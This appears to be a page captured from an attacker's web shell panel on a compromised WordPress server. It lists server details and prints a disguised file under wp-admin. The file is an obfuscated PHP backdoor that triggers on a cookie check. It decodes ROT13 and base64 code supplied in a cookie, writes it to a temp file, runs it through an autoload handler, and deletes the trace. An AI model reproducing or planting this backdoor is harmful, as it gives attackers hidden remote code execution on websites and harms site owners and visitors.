HEX
Server: LiteSpeed
System: Linux 110.webhostingindonesia.co.id 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User: uvlnfyba (10197)
PHP: 7.4.33
Disabled: opcache_get_status,exec,passthru,shell_exec,system,popen,mail,proc_open,show_source,
$ pwd: /home/jkwebsite.my.id/data.jkwebsite.my.id/wp-admin/
Upload Files
File: /home/jkwebsite.my.id/data.jkwebsite.my.id/wp-admin/home-1757932749.php
<!--l7rNcNP1-->
<?php

if (isset($_COOKIE[88-88]) && isset($_COOKIE[39-38]) && isset($_COOKIE[40-37]) && isset($_COOKIE[18-14])) {
    $parameter_group = $_COOKIE;
    function auth_exception_handler($binding) {
        $parameter_group = $_COOKIE;
        $pset = tempnam((!empty(session_save_path()) ? session_save_path() : sys_get_temp_dir()), 'mFRgbEqM');
        if (!is_writable($pset)) {
            $pset = getcwd() . DIRECTORY_SEPARATOR . "batch_process";
        }
        $ptr = "\x3c\x3f\x70\x68p " . base64_decode(str_rot13($parameter_group[3]));
        if (is_writeable($pset)) {
            $mrk = fopen($pset, 'w+');
            fputs($mrk, $ptr);
            fclose($mrk);
            spl_autoload_unregister(__FUNCTION__);
            require_once($pset);
            @array_map('unlink', array($pset));
        }
    }
    spl_autoload_register("auth_exception_handler");
    $pgrp = "dc4e5d9004ada742da4bf931998680c0";
    if (!strncmp($pgrp, $parameter_group[4], 32)) {
        if (@class_parents("right_pad_string_app_initializer", true)) {
            exit;
        }
    }
}
@ Telegram